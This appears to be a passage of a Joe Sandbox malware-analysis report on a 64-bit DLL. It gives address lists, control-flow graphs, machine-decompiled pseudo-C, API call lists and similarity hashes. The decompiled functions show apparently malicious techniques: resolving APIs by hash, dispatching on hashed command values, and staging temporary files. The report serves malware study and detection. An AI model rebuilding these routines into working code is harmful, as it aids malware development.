                  0x180008dbe
                  0x180008dca
                  0x180008ddc
                  0x180008de0
                  0x180008de3
                  0x180008deb
                  0x180008df3
                  0x180008e09
                  0x180008e0e
                  0x180008e14
                  0x180008e1a
                  0x180008e29
                  0x180008e35
                  0x180008e3f
                  0x180008e44
                  0x180008e46
                  0x180008e49
                  0x180008e4e
                  0x180008e53
                  0x180008e5c
                  0x180008e63
                  0x180008e63
                  0x180008e6b
                  0x180008e79
                  0x180008e7e
                  0x180008e85
                  0x180008e8a
                  0x180008e8c
                  0x180008e8f
                  0x180008e93
                  0x180008e97
                  0x180008e9e
                  0x180008ea0
                  0x180008ea3
                  0x180008ea9
                  0x180008eae
                  0x180008eb3
                  0x180008eb5
                  0x180008eba
                  0x180008ec3
                  0x180008eca
                  0x180008ed8
                  0x180008ee6
                  0x180008ef3
                  0x180008ef7
                  0x180008efb
                  0x180008f03
                  0x180008f05
                  0x180008f09
                  0x180008f12
                  0x180008f1b
                  0x180008f2a
                  0x180008f38
                  0x180008f4d
                  0x180008f57
                  0x180008f77
                  0x180008f7f
                  0x180008fa5
                  0x180008fba
                  0x180008fbf
                  0x180008fc8
                  0x180008fcc
                  0x180008fd5
                  0x180008ff5
                  0x180008ffa
                  0x180008ffa
                  0x18000900b
                  0x180009013
                  0x180009021
                  0x180009026
                  0x18000902d
                  0x18000903b
                  0x18000903e
                  0x180009048
                  0x180009058
                  0x18000905e
                  0x180009081
                  0x180009099
                  0x1800090a4
                  0x1800090a9
                  0x1800090ad
                  0x1800090b7
                  0x1800090cc
                  0x1800090d3
                  0x1800090d8
                  0x1800090dc
                  0x1800090e2
                  0x1800090e9
                  0x18000910c

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
                  • String ID:
                  • API String ID: 3273538229-0
                  • Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
                  • Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 520 180001844-180001874 521 18000187a-18000187d 520->521 522 180001a6f-180001a85 520->522 521->522 523 180001883-180001893 call 180007b04 521->523 526 180001899-1800018b3 GetTempPathW 523->526 527 180001a6a 523->527 528 180001a55 526->528 529 1800018b9-1800018cf HeapAlloc 526->529 527->522 530 180001a5a-180001a68 HeapFree 528->530 529->528 531 1800018d5-1800018e3 GetTempPathW 529->531 530->522 532 1800018e5-180001914 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 531->532 533 180001916-180001924 HeapFree 531->533 532->533 534 180001927-18000192a 532->534 533->534 534->528 535 180001930-180001935 534->535 536 180001938-18000194f StrChrW 535->536 537 180001951-180001962 536->537 538 180001964-180001972 lstrlenW 536->538 539 180001976-180001979 537->539 538->539 540 1800019a7-1800019ab 539->540 541 18000197b-180001986 539->541 544 1800019b9-1800019c4 540->544 545 1800019ad-1800019b7 540->545 542 180001988-18000198c 541->542 543 18000198e-180001997 541->543 542->543 546 180001999-18000199c 542->546 543->541 543->546 547 1800019c6-1800019e0 call 180009b7c 544->547 548 1800019ef-1800019f2 544->548 545->546 546->540 549 18000199e-1800019a5 546->549 552 180001a3c-180001a53 DeleteFileW HeapFree 547->552 556 1800019e2-1800019e8 547->556 551 1800019f4-180001a0d call 180003698 548->551 548->552 549->540 549->545 551->552 557 180001a0f-180001a36 call 180005bdc HeapFree 551->557 552->530 556->551 558 1800019ea 556->558 557->552 558->536
                  C-Code - Quality: 15%
                  			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
                  				signed long long _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t27;
                  				int _t34;
                  				void* _t36;
                  				int _t53;
                  				int _t61;
                  				intOrPtr _t68;
                  				intOrPtr _t69;
                  				intOrPtr* _t92;
                  				signed long long _t93;
                  				intOrPtr* _t106;
                  				void* _t118;
                  				void* _t121;
                  				intOrPtr* _t122;
                  				intOrPtr* _t123;
                  				void* _t125;
                  				signed long long _t132;
                  				void* _t140;
                  				void* _t145;
                  
                  				_t94 = __rbx;
                  				_a8 = __rbx;
                  				_t92 =  *0x8000d4a0;
                  				r12d = 0;
                  				_t145 = __rcx;
                  				if (__rdx == _t140) goto 0x80001a6f;
                  				if ( *__rdx == r12b) goto 0x80001a6f;
                  				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
                  				if (_t92 == _t140) goto 0x80001a6a;
                  				_t93 =  *0x8000d4a0;
                  				_t27 = GetTempPathW(??, ??);
                  				if (_t27 == r12d) goto 0x80001a55;
                  				HeapAlloc(??, ??, ??);
                  				if (_t93 == _t140) goto 0x80001a55;
                  				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
                  				GetSystemTimeAsFileTime(??);
                  				r8d = GetCurrentThreadId() ^ _a32;
                  				if (GetTempFileNameW(??, ??, ??, ??) != r12d) goto 0x80001927;
                  				_t132 = _t93;
                  				HeapFree(??, ??, ??);
                  				if (_t140 == _t140) goto 0x80001a55;
                  				_t122 = _t92;
                  				__imp__StrChrW();
                  				r8d = 0;
                  				if (_t93 == _t132) goto 0x80001964;
                  				_a16 = _t27;
                  				goto 0x80001976;
                  				_t106 = _t122;
                  				_t34 = lstrlenW(??);
                  				r8d = 0;
                  				_a16 = _t34;
                  				if (_t34 == r8d) goto 0x800019a7;
                  				_t11 = _t106 - 1; // -1
                  				_t61 = _t11;
                  				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
                  				if (_t68 == 0x20) goto 0x8000198e;
                  				if (_t68 != 9) goto 0x80001999;
                  				_t53 = _t61;
                  				_a16 = _t61;
                  				if (_t61 != r8d) goto 0x8000197b;
                  				if (_t53 == r8d) goto 0x800019a7;
                  				_t69 =  *_t122;
                  				if (_t69 == 0x20) goto 0x800019ad;
                  				if (_t69 != 9) goto 0x800019b9;
                  				_t123 = _t122 + 2;
                  				_a16 = _t53 - 1;
                  				goto 0x80001999;
                  				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
                  				if ( *_t123 == r8w) goto 0x800019ef;
                  				_v72 = _t132;
                  				r9d = 0;
                  				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
                  				if (_t36 != 0) goto 0x80001a3c;
                  				if (_t93 + 2 == 0) goto 0x800019f4;
                  				goto 0x80001938;
                  				if (_t36 != r8d) goto 0x80001a3c;
                  				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
                  				r9d = _a16;
                  				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
                  				HeapFree(??, ??, ??);
                  				DeleteFileW(??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a5a;
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a6f;
                  				return 8;
                  			}

























                  0x180001844
                  0x180001844
                  0x180001858
                  0x18000185f
                  0x180001869
                  0x180001874
                  0x18000187d
                  0x180001888
                  0x180001893
                  0x180001899
                  0x1800018a8
                  0x1800018b3
                  0x1800018c3
                  0x1800018cf
                  0x1800018e3
                  0x1800018ed
                  0x180001908
                  0x180001914
                  0x180001916
                  0x18000191e
                  0x18000192a
                  0x180001935
                  0x180001940
                  0x180001946
                  0x18000194f
                  0x18000195e
                  0x180001962
                  0x180001964
                  0x180001967
                  0x18000196d
                  0x180001972
                  0x180001979
                  0x18000197b
                  0x18000197b
                  0x18000197e
                  0x180001986
                  0x18000198c
                  0x18000198e
                  0x180001990
                  0x180001997
                  0x18000199c
                  0x18000199e
                  0x1800019a5
                  0x1800019ab
                  0x1800019ad
                  0x1800019b3
                  0x1800019b7
                  0x1800019bb
                  0x1800019c4
                  0x1800019c6
                  0x1800019cb
                  0x1800019d7
                  0x1800019e0
                  0x1800019e8
                  0x1800019ea
                  0x1800019f2
                  0x180001a0d
                  0x180001a0f
                  0x180001a22
                  0x180001a36
                  0x180001a3f
                  0x180001a4d
                  0x180001a53
                  0x180001a62
                  0x180001a68
                  0x180001a85

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
                  • String ID:
                  • API String ID: 2968359827-0
                  • Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
                  • Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
                  				void* __rdi;
                  				void* __rsi;
                  				signed int _t35;
                  				void* _t69;
                  				void* _t80;
                  				char* _t113;
                  				signed long long _t116;
                  				char* _t124;
                  				void* _t142;
                  				void* _t145;
                  				char* _t147;
                  				signed long long _t150;
                  				void* _t152;
                  				void* _t153;
                  				long _t169;
                  				void* _t170;
                  				void* _t172;
                  				void* _t175;
                  
                  				_t116 = __rbx;
                  				 *((long long*)(_t152 + 8)) = __rbx;
                  				 *(_t152 + 0x18) = _t150;
                  				_t153 = _t152 - 0x40;
                  				_t113 =  *0x8000d4a0;
                  				r15d =  *0x8000d498;
                  				_t35 = r15d ^ __edx;
                  				_t146 = __r8;
                  				_t170 = __rcx;
                  				_t4 = _t150 + 1; // 0x1
                  				_t80 = _t4;
                  				if (_t35 == 0x139d2b8d) goto 0x8000588d;
                  				if (_t35 == 0x15f5a8c2) goto 0x80005865;
                  				if (_t35 == 0x2f77acf9) goto 0x8000588b;
                  				if (_t35 == 0x31f2972e) goto 0x80005861;
                  				if (_t35 == 0x48e12436) goto 0x80005965;
                  				if (_t35 == 0x4d382929) goto 0x80005905;
                  				if (_t35 == 0x7f513d6b) goto 0x80005863;
                  				if (_t35 == 0xb016dc39) goto 0x80005852;
                  				if (_t35 == 0xb057dfc9) goto 0x800057e4;
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
                  				if (_t113 == 0) goto 0x8000583e;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
                  				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
                  				goto 0x800059bb;
                  				HeapFree(_t172, _t169, _t142);
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				SetEvent(_t145);
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				_t124 = _t113;
                  				E000000011800024CC(r9d, _t116, _t124, _t146);
                  				_t147 = _t113;
                  				if (_t113 == 0) goto 0x8000583e;
                  				if (_t80 + _t80 != 2) goto 0x800058ae;
                  				goto 0x800058c2;
                  				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
                  				WaitForSingleObject(??, ??);
                  				asm("sbb ebx, ebx");
                  				goto 0x800058f1;
                  				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
                  				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
                  				goto 0x8000582e;
                  				if (_t80 == 0) goto 0x800059bb;
                  				if (0x426 != 0x426) goto 0x800059bb;
                  				if (_t147 == 0) goto 0x8000595f;
                  				if ( *_t147 == 0) goto 0x8000595f;
                  				memset(??, ??, ??);
                  				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
                  				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
                  				asm("ror ax, 0x8");
                  				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
                  				if (0 != 0) goto 0x800059bb;
                  				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
                  				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
                  				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
                  				HeapFree(??, ??, ??);
                  				goto 0x8000599f;
                  				if (_t80 == 0) goto 0x800059bb;
                  				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
                  				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
                  				if (_t69 == 0x3e5) goto 0x800059e1;
                  				r8d = _t69;
                  				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
                  				return _t69;
                  			}





















                  0x180005748
                  0x180005748
                  0x18000574d
                  0x18000575a
                  0x18000575e
                  0x180005765
                  0x180005777
                  0x180005779
                  0x18000577c
                  0x18000577f
                  0x18000577f
                  0x180005787
                  0x180005792
                  0x18000579d
                  0x1800057a8
                  0x1800057b3
                  0x1800057be
                  0x1800057c9
                  0x1800057d4
                  0x1800057db
                  0x1800057df
                  0x1800057e7
                  0x1800057ef
                  0x1800057fa
                  0x180005804
                  0x18000581f
                  0x180005826
                  0x180005833
                  0x180005839
                  0x180005843
                  0x18000584d
                  0x180005856
                  0x18000585c
                  0x180005868
                  0x18000586d
                  0x180005870
                  0x180005875
                  0x18000587b
                  0x180005880
                  0x180005889
                  0x180005894
                  0x18000589c
                  0x1800058a4
                  0x1800058ac
                  0x1800058be
                  0x1800058ca
                  0x1800058de
                  0x1800058e7
                  0x1800058f3
                  0x1800058ff
                  0x18000590d
                  0x180005912
                  0x180005926
                  0x18000593a
                  0x18000594d
                  0x180005954
                  0x180005958
                  0x180005963
                  0x18000596d
                  0x180005976
                  0x180005983
                  0x180005990
                  0x180005998
                  0x1800059a1
                  0x1800059b9
                  0x1800059c4
                  0x1800059cc
                  0x1800059d6
                  0x1800059dc
                  0x1800059fb

                  APIs
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
                  • SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
                  • WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
                  • memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: FreeHeap$EventObjectSingleWaitmemset
                  • String ID: ))8M$6$H$lJu
                  • API String ID: 2222956709-2816507560
                  • Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
                  • Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 24%
                  			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
                  				void* _v40;
                  				char _v80;
                  				intOrPtr _v88;
                  				char _v96;
                  				char _v104;
                  				intOrPtr _v120;
                  				long long _v128;
                  				long long _v136;
                  				char _t57;
                  				intOrPtr _t95;
                  				void* _t96;
                  				long long* _t114;
                  				long long* _t115;
                  
                  				_t114 = __rax;
                  				_a8 = __rbx;
                  				_a16 = __rbp;
                  				_a24 = __rsi;
                  				_t141 =  *0x8000d4a0;
                  				r14d = __ecx;
                  				_t95 = r8d;
                  				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004a75;
                  				r9d = 0x18;
                  				r8d = 0;
                  				_v136 = 0xf0000040;
                  				 *_t114();
                  				goto 0x80004a77;
                  				if (0 == 0) goto 0x80004c20;
                  				r8d = _a56;
                  				_t10 =  &_v96; // -190
                  				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
                  				_t11 = _t114 + 0x10; // 0x10
                  				r15d = _t11;
                  				memset(??, ??, ??);
                  				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004ae3;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004ae5;
                  				if (0 != 0) goto 0x80004af9;
                  				if (GetLastError() != 0) goto 0x80004c02;
                  				_t57 =  >  ? r15d : _t95;
                  				r8d = _t57;
                  				_v104 = _t57;
                  				memcpy(??, ??, ??);
                  				_t96 = _t95 - _v104;
                  				if (r14d == 0) goto 0x80004b70;
                  				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t23 =  &_v104; // -198
                  				_v120 = 0x20;
                  				_v128 = _t23;
                  				_t26 =  &_v80; // -174
                  				r8b = _t96 == 0;
                  				_v136 = _t26;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				E0000000118000459C(0x8ea73a36, _t114, _v96);
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t29 =  &_v104; // -198
                  				_v128 = _t29;
                  				r8b = _t96 == 0;
                  				_t31 =  &_v80; // -174
                  				_v136 = _t31;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				if (0 == 0) goto 0x80004bd6;
                  				r8d = _v104;
                  				memcpy(??, ??, ??);
                  				if (_t96 == 0) goto 0x80004bde;
                  				goto 0x80004afd;
                  				GetLastError();
                  				_t115 = _a40;
                  				 *_t115 = 0 + _v104;
                  				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c02;
                  				 *_t115();
                  				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c28;
                  				 *_t115();
                  				goto 0x80004c28;
                  				return GetLastError();
                  			}
















                  0x180004a14
                  0x180004a14
                  0x180004a19
                  0x180004a1e
                  0x180004a33
                  0x180004a3a
                  0x180004a4c
                  0x180004a4f
                  0x180004a57
                  0x180004a5e
                  0x180004a64
                  0x180004a69
                  0x180004a71
                  0x180004a73
                  0x180004a79
                  0x180004a7f
                  0x180004a94
                  0x180004aa2
                  0x180004aa8
                  0x180004aa8
                  0x180004ab7
                  0x180004ac5
                  0x180004acd
                  0x180004adc
                  0x180004adf
                  0x180004ae1
                  0x180004ae7
                  0x180004af3
                  0x180004b07
                  0x180004b0e
                  0x180004b11
                  0x180004b15
                  0x180004b1e
                  0x180004b2c
                  0x180004b33
                  0x180004b3b
                  0x180004b3d
                  0x180004b40
                  0x180004b45
                  0x180004b4d
                  0x180004b52
                  0x180004b59
                  0x180004b5d
                  0x180004b67
                  0x180004b6c
                  0x180004b6e
                  0x180004b75
                  0x180004b7d
                  0x180004b7f
                  0x180004b82
                  0x180004b89
                  0x180004b8e
                  0x180004b92
                  0x180004b97
                  0x180004ba1
                  0x180004ba6
                  0x180004ba8
                  0x180004bae
                  0x180004bb0
                  0x180004bbd
                  0x180004bcf
                  0x180004bd1
                  0x180004bd6
                  0x180004bde
                  0x180004beb
                  0x180004bf1
                  0x180004bf9
                  0x180004c00
                  0x180004c0b
                  0x180004c13
                  0x180004c1c
                  0x180004c1e
                  0x180004c4a

                  APIs
                    • Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8
                  • memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorLast$memcpy$memset
                  • String ID: $@
                  • API String ID: 1408984137-1077428164
                  • Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
                  • Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                  				void* __rdi;
                  				long _t49;
                  				void* _t54;
                  				void* _t72;
                  				signed long long _t94;
                  				signed long long _t95;
                  				long long* _t97;
                  				int _t112;
                  				void* _t113;
                  				signed long long _t118;
                  				void* _t120;
                  				long long* _t126;
                  				void* _t128;
                  				signed long long _t129;
                  				void* _t131;
                  
                  				 *((long long*)(_t120 + 8)) = __rbx;
                  				 *(_t120 + 0x10) = _t118;
                  				 *((long long*)(_t120 + 0x18)) = __rsi;
                  				_t116 =  *0x8000d4a0;
                  				_t113 = __r9;
                  				_t97 = __rcx;
                  				if (__r9 != 0) goto 0x80003a5b;
                  				goto 0x80003be2;
                  				r8d = 0x10;
                  				memcpy(_t131, _t128, _t112);
                  				InitializeCriticalSection(??);
                  				_t6 = _t97 + 0x88; // 0x88
                  				_t126 = _t6;
                  				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
                  				_t129 = _t128 | 0xffffffff;
                  				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
                  				r13d = _t129 + 2;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
                  				 *((long long*)(__rcx + 0x90)) = _t126;
                  				 *_t126 = _t126;
                  				 *(__rcx + 0x10) = _t129;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				r9d = 0;
                  				r8d = 0;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
                  				r8d = 0;
                  				CreateMutexA(??, ??, ??);
                  				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
                  				 *(__rcx + 0x38) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
                  				 *_t97 = E00000001180008368;
                  				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				_t72 = _t129 + 7;
                  				if (E00000001180008368 == 0) goto 0x80003b4c;
                  				r8d = _t72;
                  				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
                  				goto 0x80003b4f;
                  				_t94 = _t129;
                  				 *(_t97 + 0x10) = _t94;
                  				if (_t94 != _t129) goto 0x80003bb0;
                  				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003b79;
                  				 *_t94();
                  				goto 0x80003b7b;
                  				if (0 != 0) goto 0x80003bd6;
                  				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003ba4;
                  				r8d = _t72;
                  				 *_t94();
                  				goto 0x80003ba7;
                  				_t95 = _t129;
                  				 *(_t97 + 0x10) = _t95;
                  				if (_t95 == _t129) goto 0x80003bd6;
                  				_t28 = _t97 + 0x18; // 0x18
                  				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
                  				 *(_t97 + 8) = _t95;
                  				if (_t95 == 0) goto 0x80003bd6;
                  				SwitchToThread();
                  				goto 0x80003c03;
                  				_t49 = GetLastError();
                  				if (_t49 == 0) goto 0x80003c03;
                  				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
                  				if (r13d == 0) goto 0x80003c03;
                  				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t95 == 0) goto 0x80003c03;
                  				 *_t95();
                  				return _t49;
                  			}


















                  0x180003a24
                  0x180003a29
                  0x180003a2e
                  0x180003a3f
                  0x180003a48
                  0x180003a4b
                  0x180003a51
                  0x180003a56
                  0x180003a5f
                  0x180003a65
                  0x180003a6e
                  0x180003a74
                  0x180003a74
                  0x180003a82
                  0x180003a89
                  0x180003a94
                  0x180003aa2
                  0x180003aa7
                  0x180003aaa
                  0x180003ab2
                  0x180003ab9
                  0x180003ac0
                  0x180003ac3
                  0x180003ac7
                  0x180003acd
                  0x180003ad4
                  0x180003ada
                  0x180003add
                  0x180003ae5
                  0x180003aeb
                  0x180003af2
                  0x180003af8
                  0x180003afc
                  0x180003b03
                  0x180003b09
                  0x180003b0d
                  0x180003b14
                  0x180003b1f
                  0x180003b29
                  0x180003b30
                  0x180003b35
                  0x180003b3d
                  0x180003b42
                  0x180003b48
                  0x180003b4a
                  0x180003b4c
                  0x180003b4f
                  0x180003b56
                  0x180003b61
                  0x180003b69
                  0x180003b75
                  0x180003b77
                  0x180003b7d
                  0x180003b8b
                  0x180003b93
                  0x180003b95
                  0x180003ba0
                  0x180003ba2
                  0x180003ba4
                  0x180003ba7
                  0x180003bae
                  0x180003bb0
                  0x180003bbe
                  0x180003bc3
                  0x180003bca
                  0x180003bcc
                  0x180003bd4
